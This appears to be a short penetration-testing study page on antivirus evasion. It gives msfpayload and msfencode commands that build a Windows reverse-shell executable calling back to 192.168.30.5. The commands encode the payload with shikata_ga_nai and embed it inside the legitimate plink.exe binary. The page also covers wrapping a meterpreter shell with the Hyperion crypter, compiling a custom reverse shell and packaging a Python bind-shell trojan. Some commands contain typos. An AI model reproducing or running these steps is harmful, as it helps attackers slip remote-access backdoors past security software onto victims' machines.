Anti-Virus Avoidance:

Employe black list technology: know signatures of malware are searched in the files, system and get quarantined if found

  • Create standard payload using MSFconsole :
msfpayload windows/shell_reverse_tcp LHOST=192.168.30.5 LPORT=444 X > ~/Desktop/shell_reverse.exe
  • Encode the payload (Detection of payload is less as it is encoded):
msfpayload windows/shell_reverse_tcp LHOST=4444 R | msfencode -e x86/shikata_ga_nai -t exe -c 9 -o ~/Deskstop/shell_reverse_msf_encoded.exe
  • Embedding payload into non malicious PE executable
msfpayload windows/shell_reverse_tcp LHOST=192.168.30.5 LPORT=44 R | msfencode -e x86/shikata_ga_nai -t exe -c 9 -x /usr/share/windows-binaries/plink.exe -o ~/Desktop/shell_reverse_msf_encoded_embedded.exe

Packers and Crypters:

Software protection tools and crypters are often used to obfuscate to prevent reverse engineering of software.

cross compile :
>> i586-mingw32msvc-g++ Src/Crypter/*.cpp -o hyperion.exe

Use hyperion to protect the meterpeter reverse shell
>> wine hyperion.exe ~/Desktop/crypted.exe

Custom Tools:

use tools and binaries not know to antivirus

i586-mingw32msvc-gcc reverse.c -o ~/Desktop/custom-reverse.exe -lws2_32

Python Bind shell trojan

Run on the port 4444 and run any command sent to this port .

cross compile using the PyInstaller

results matching ""

    No results matching ""